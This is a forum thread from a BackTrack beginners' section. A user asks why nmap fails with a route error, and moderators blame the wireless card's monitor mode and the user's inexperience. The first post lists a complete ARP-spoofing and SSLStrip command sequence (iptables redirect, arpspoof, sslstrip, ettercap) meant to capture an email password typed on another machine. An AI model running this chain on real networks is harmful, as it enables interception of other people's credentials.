Results 1 to 6 of 6

Thread: Nmap trouble

  1. #1
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    9

    Default Nmap trouble

    So, I recently started to use nmap and had developed in interest in using it with SSLStrip just while I was at home, trying to find the password of my e-mail account as I entered it into another laptop I have on the network.
    This was the setup I intended to use:

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    nmap 192.168.1.1-254
    #(find private IP of my other laptop)
    arpspoof -i eth0 -t 192.168.1.xxx 192.168.1.1
    #run SSLStrip
    sslstrip -h
    sslstrip -a
    ettercap -T -q -i wlan0

    But I never got past the use of nmap because no matter what I tried, I always got the error:

    root@bt:~# nmap 192.168.1.1/24

    Starting Nmap 5.00 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2010-02-13 14:58 EST
    Premature EOF in /proc/net/route
    nexthost: failed to determine route to 192.168.1.1
    QUITTING!


    Any ideas on this one?
    I'm running off of VM on a Vistax64 with an Alfa USB 500mW WiFI Adapter in monitor mode.

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Nmap trouble

    Quote Originally Posted by llabrword View Post
    But I never got past the use of nmap because no matter what I tried, I always got the error:

    root@bt:~# nmap 192.168.1.1/24

    Starting Nmap 5.00 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2010-02-13 14:58 EST
    Premature EOF in /proc/net/route
    nexthost: failed to determine route to 192.168.1.1
    QUITTING!


    Any ideas on this one?
    I'm running off of VM on a Vistax64 with an Alfa USB 500mW WiFI Adapter in monitor mode.

    Just curious by why are you running your card in monitor mode and trying to use nmap at the same time? You don't want your card to be in monitor mode to run a nmap scan.

    It is obvious you don't have a clue as to what you are doing. I would suggest you stop and read some man pages either within bt and or on the internet.
    Start with man nmap.

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    46

    Default Re: Nmap trouble

    If your wifi chip is in monitor mode, then it would make a lot of sense that Nmap would fail to determine a route to 192.168.1.1. Put card back into managed mode and connect to the router and nmap should work fine.

    /edit Soz, archangel got to it while I was writing my post. I second his statements.

  4. #4
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    9

    Default Re: Nmap trouble

    Yes, honestly I don't know much about nmap specifically, but that doesn't seem to be the trouble:

    root@bt:~# iwconfig wlan0 mode managed
    root@bt:~# nmap 192.168.1.1-24

    Starting Nmap 5.00 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2010-02-13 15:56 EST
    Premature EOF in /proc/net/route
    nexthost: failed to determine route to 192.168.1.1
    QUITTING!

    (I'm re-reading man nmap now)

  5. #5
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Nmap trouble

    Quote Originally Posted by llabrword View Post
    Yes, honestly I don't know much about nmap specifically, but that doesn't seem to be the trouble:

    root@bt:~# iwconfig wlan0 mode managed
    root@bt:~# nmap 192.168.1.1-24

    Starting Nmap 5.00 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2010-02-13 15:56 EST
    Premature EOF in /proc/net/route
    nexthost: failed to determine route to 192.168.1.1
    QUITTING!

    (I'm re-reading man nmap now)
    Actually the above does suggest you don't know what you are doing.


    root@bt: nmap 192.168.1.1/24 works just fine for me.
    But that is not what you are doing.
    Matter of fact a better suggestion is to stop reading the man page for nmap (at this point you don't need it ) you need to read my guide on "if you are new to BT and linux read this first"
    It's at the top of the beginner section.

  6. #6
    Member xX_Spiidey_Xx's Avatar
    Join Date
    Jan 2010
    Location
    /dev/urandom
    Posts
    256

    Default Re: Nmap trouble

    If you want to walk the internets, maybe you should be connected to them first.
    thou shalt treat all computers as thou wouldst treat thyself, for thou art the creator of thine own problems.

Similar Threads

  1. Trouble Booting
    By espkia in forum Beginners Forum
    Replies: 1
    Last Post: 02-06-2010, 06:00 PM
  2. Some trouble with medusa/hydra
    By necroth85 in forum Beginners Forum
    Replies: 0
    Last Post: 02-03-2010, 05:39 AM
  3. NMAP scan of my real IP address
    By Linus1907 in forum Beginners Forum
    Replies: 13
    Last Post: 02-01-2010, 10:47 AM
  4. nmap stack smashing
    By RageLtMan in forum Beginners Forum
    Replies: 8
    Last Post: 01-29-2010, 06:18 AM
  5. Trouble Deauthing my Laptop?
    By MassAppeal in forum Beginners Forum
    Replies: 8
    Last Post: 01-20-2010, 10:00 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •